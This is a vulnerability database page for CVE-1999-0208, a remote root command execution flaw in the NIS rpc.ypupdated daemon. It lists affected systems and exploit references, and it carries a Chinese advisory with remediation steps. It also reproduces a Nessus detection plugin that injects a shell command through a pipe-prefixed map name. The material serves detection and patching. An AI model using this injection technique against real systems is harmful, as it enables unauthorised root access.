Vulnerabilities > CVE-1999-0208

CVSS 10.0 - CRITICAL

Attack vector

NETWORK

Attack complexity

LOW

Privileges required

NONE

Confidentiality impact

COMPLETE

Integrity impact

COMPLETE

Availability impact

COMPLETE

network

low complexity

sgi

nec

ibm

critical

nessus

exploit available

NVD

Published: 1995-12-12

Updated: 2022-08-17

Summary

rpc.ypupdated (NIS) allows remote users to execute arbitrary commands.

Vulnerable Configurations

Part	Description	Count
OS	Sgi SGI Irix 3 SGI Irix 5.0 SGI Irix 5.1 SGI Irix 5.2 SGI Irix 4	5
OS	Nec NEC EWS UX V * NEC UP UX V * NEC ASL UX 4800 *	3
OS	Ibm IBM AIX 4.1 IBM AIX 3.2	2

Exploit-Db

description	HP-UX 10/11,IRIX 3/4/5/6,OpenSolaris build snv,Solaris 8/9/10,SunOS 4.1 RPC.YPUpdated Command Execution (2). CVE-1999-0208. Remote exploits for multiple plat...
id	EDB-ID:20259
last seen	2016-02-02
modified	1994-02-07
published	1994-02-07
reporter	anonymous
source	https://www.exploit-db.com/download/20259/
title	HP-UX 10/11,IRIX 3/4/5/6,OpenSolaris build snv,Solaris 8/9/10,SunOS 4.1 RPC.YPUpdated Command Execution 2

description	HP-UX 10/11,IRIX 3/4/5/6,OpenSolaris build snv,Solaris 8/9/10,SunOS 4.1 RPC.YPUpdated Command Execution (1). CVE-1999-0208. Remote exploits for multiple plat...
id	EDB-ID:20258
last seen	2016-02-02
modified	1994-02-07
published	1994-02-07
reporter	Josh D
source	https://www.exploit-db.com/download/20258/
title	HP-UX 10/11,IRIX 3/4/5/6,OpenSolaris build snv,Solaris 8/9/10,SunOS 4.1 RPC.YPUpdated Command Execution 1

Nessus

NASL family	RPC
NASL id	YPUPDATED_REMOTE_EXEC.NASL
description	ypupdated is part of NIS and allows a client to update NIS maps. This old command execution vulnerability was discovered and fixed in 1995. However, it is still possible to run ypupdated in insecure mode by adding the
last seen	2020-06-01
modified	2020-06-02
plugin id	31683
published	2008-03-28
reporter	This script is Copyright (C) 2008-2018 Tenable Network Security, Inc.
source	https://www.tenable.com/plugins/nessus/31683
title	Multiple Vendor NIS rpc.ypupdated YP Map Update Arbitrary Remote Command Execution
code	# # (C) Tenable Network Security, Inc. # include("compat.inc"); if(description) { script_id(31683); script_version ("1.17"); script_cve_id("CVE-1999-0208"); script_bugtraq_id(1749, 28383); script_name(english:"Multiple Vendor NIS rpc.ypupdated YP Map Update Arbitrary Remote Command Execution"); script_set_attribute(attribute:"synopsis", value: "'ypupdated -i' is running on this port." ); script_set_attribute(attribute:"description", value: "ypupdated is part of NIS and allows a client to update NIS maps. This old command execution vulnerability was discovered and fixed in 1995. However, it is still possible to run ypupdated in insecure mode by adding the '-i' option. Anybody can easily run commands as root on this machine by specifying an invalid map name that starts with a pipe (\|) character. Exploits have been publicly available since the first advisory." ); script_set_attribute(attribute:"solution", value: "Remove the '-i' option. If this option was not set, the rpc.ypupdated daemon is still vulnerable to the old flaw; contact your vendor for a patch." ); script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C"); script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"metasploit_name", value:'Solaris ypupdated Command Execution'); script_set_attribute(attribute:"exploit_framework_metasploit", value:"true"); script_set_attribute(attribute:"plugin_publication_date", value: "2008/03/28"); script_set_attribute(attribute:"vuln_publication_date", value: "1994/12/12"); script_set_attribute(attribute:"plugin_modification_date", value:"2020/06/12"); script_set_attribute(attribute:"plugin_type", value:"remote"); script_end_attributes(); script_summary(english: "Run shell script through rpc.ypupdated"); script_category(ACT_ATTACK); script_copyright(english:"This script is Copyright (C) 2008-2020 Tenable Network Security, Inc."); script_family(english:"RPC"); script_dependencie("rpc_portmap.nasl", "rpcinfo.nasl"); exit(0); } include("sunrpc_func.inc"); g_timeout = 15; # Must be greater than the maximum sleep value RPC_PROG = 100028; function test(port, sleeps, udp) { local_var soc, mapname, packet, tictac1, tictac2, d, data, credentials, sleep; foreach sleep (sleeps) { if(!udp) { if (! get_tcp_port_state(port)) return 0; soc = open_sock_tcp (port); if (!soc) return 0; } else { if (! get_udp_port_state(port)) return 0; soc = open_sock_udp (port); if (!soc) return 0; } # Pre-compiled plugins - there does not appear to be any function named xdr_auth_unix # The following is from Appendix A - IETF RFC 1831 - https://tools.ietf.org/html/rfc1831#appendix-A credentials = xdr_long(0) + #stamp xdr_string('localhost') + #machinename xdr_long(0) + #uid xdr_long(0) + #gid xdr_long(0) + xdr_long(0) + xdr_long(0) + xdr_long(0) + xdr_long(0) + xdr_long(0) + xdr_long(0) + xdr_long(0) + xdr_long(0) + xdr_long(0) + xdr_long(0) + xdr_long(0) + xdr_long(0) + xdr_long(0) + xdr_long(0) + xdr_long(0); # credentials = xdr_auth_unix(hostname: 'localhost', uid: 0, gid: 0); mapname = strcat("\|sleep ", sleep, "; true > /dev/null;"); data = xdr_string(mapname) + xdr_long(2) + xdr_long(0x78000000) + xdr_long(2) + xdr_long(0x78000000) ; packet = rpc_packet (prog:RPC_PROG, vers:1, proc:0x01, credentials:credentials, data:data, udp:udp); tictac1 = unixtime(); data = rpc_sendrecv (socket:soc, packet:packet, udp:udp, timeout:g_timeout); close(soc); tictac2 = unixtime(); d = tictac2 - tictac1; if ( isnull(data) \|\| (d < sleep) \|\| (d >= (sleep + 5)) ) return 0; } return 1; } function check_flaw(ports, udp) { local_var port; foreach port(ports) { if (test(port: port, sleeps: make_list(1, 3, 7), udp: udp)) security_hole(port: port); } } tcp_ports = get_kb_list('Services/rpc-ypupdated'); if (isnull(tcp_ports)) { port = get_rpc_port2(program: RPC_PROG, protocol: IPPROTO_TCP); if (port) tcp_ports = make_list(port); } check_flaw(ports:tcp_ports, udp:0); udp_ports = get_kb_list('Services/udp/rpc-ypupdated'); if (isnull(udp_ports)) { port = get_rpc_port2(program: RPC_PROG, protocol: IPPROTO_UDP); if (port) udp_ports = make_list(port); } check_flaw(ports:udp_ports, udp:1);

Saint

bid	1749
description	rpc.ypupdated command injection vulnerability
id	misc_solaris_rpcypupdated
osvdb	11517
title	ypupdated
type	remote

Seebug

bulletinFamily	exploit
description	BUGTRAQ ID: 1749 CVE(CAN) ID: CVE-1999-0208 rpc.ypupdated RPC守护进程是Network Information Service (NIS)的一个组件，它使NIS客户端更新自己的NIS数据库。 rpc.ypupdated守护进程实现上存在输入验证漏洞，远程攻击者可能利用此漏洞以root用户的权限在主机上执行任意命令。当守护进程收到一个Yello Pages的更新请求，它会调用Bource Shell执行'make'命令来重新计算数据库，由于没有对用户输入进行充分过滤和检查，远程攻击者可以在输入中插入某些Shell转义符来执行攻击者指定的命令。 Multiple Vendor rpc.ypupdated - HP HP-UX 10.20 - HP HP-UX 10.10 - HP HP-UX 10.1 - IBM AIX 4.1 - IBM AIX 3.2 - SGI IRIX 6.0.1XFS - SGI IRIX 6.0.1 - SGI IRIX 6.0 - SGI IRIX 5.3XFS - SGI IRIX 5.3 - SGI IRIX 5.2 - SGI IRIX 5.1.1 - SGI IRIX 5.1 - SGI IRIX 5.0.1 - SGI IRIX 5.0 - SGI IRIX 4.0.5IPR - SGI IRIX 4.0.5H - SGI IRIX 4.0.5G - SGI IRIX 4.0.5F - SGI IRIX 4.0.5E - SGI IRIX 4.0.5D - SGI IRIX 4.0.5A - SGI IRIX 4.0.5(IOP) - SGI IRIX 4.0.5 - SGI IRIX 4.0.4T - SGI IRIX 4.0.4B - SGI IRIX 4.0.4 - SGI IRIX 4.0.3 - SGI IRIX 4.0.2 - SGI IRIX 4.0.1T - SGI IRIX 4.0.1 - SGI IRIX 4.0 - SGI IRIX 3.3.3 - SGI IRIX 3.3.2 - SGI IRIX 3.3.1 - SGI IRIX 3.3 - SGI IRIX 3.2 - Sun SunOS 4.1PSR_A - Sun SunOS 4.1.4-JL - Sun SunOS 4.1.4 - Sun SunOS 4.1.3_U1 - Sun SunOS 4.1.3c - Sun SunOS 4.1.3 - Sun SunOS 4.1.2 - Sun SunOS 4.1.1 - Sun SunOS 4.1 厂商补丁： SGI --- SGI已经为此发布了一个安全公告（19951201-01-P）以及修补建议: 19951201-01-P：Avalon Security Research - rpc.ypupdate slammer exploit CERT CA-95:17 rpc.ypupdated Vulnerability 链接：<a href=ftp://patches.sgi.com/support/free/security/advisories/19951201-01-P target=_blank>ftp://patches.sgi.com/support/free/security/advisories/19951201-01-P</a> 修补建议： 1. 变成root用户 % /bin/su Password: # 2. 查看机器上是否运行了ypupdated服务，如果没有返回东西，则可能ypupdated处于关闭状态，但为了完全起见还是建议执行接下来的操作。 # rpcinfo -p localhost \| grep ypupdate 100028 tcp 206 ypupdated # 3. 编辑/usr/etc/inetd.conf (3.x and 4.x)或/etc/inetd.conf (5.0.x, 5.1.x, and 5.2)，在有ypupdate那行前面加个"#"字符将其注释掉。 # vi /usr/etc/inetd.conf 找到如下这行： ypupdated/1 stream rpc/tcp wait root /usr/etc/rpc.ypupdated ypupdated 在其前面加"#"： #ypupdated/1 stream rpc/tcp wait root /usr/etc/rpc.ypupdated ypupdated 存盘退出。 4.重启inetd # /etc/killall -HUP inetd 5. 验证ypupdate已经不再运行了 # rpcinfo -p localhost \| grep ypupdate # 6. 返回普通用户状态 # exit $
id	SSV:3080
last seen	2017-11-19
modified	2008-03-25
published	2008-03-25
reporter	Root
source	https://www.seebug.org/vuldb/ssvid-3080
title	多家厂商rpc.ypupdated远程可执行任意命令漏洞

References

https://exchange.xforce.ibmcloud.com/vulnerabilities/CVE-1999-0208

Vulnerabilities > CVE-1999-0208 {"@context":"https://schema.org","@type":"BreadcrumbList","itemListElement":[{"@type":"ListItem","position":1,"name":"Vulnerabilities","item":"https://cyber.vumetric.com/vulns/"},{"@type":"ListItem","position":2,"name":"CVE-1999-0208"}]}

Summary

Vulnerable Configurations

Exploit-Db

Nessus

Saint

Seebug

References

Vulnerabilities > CVE-1999-0208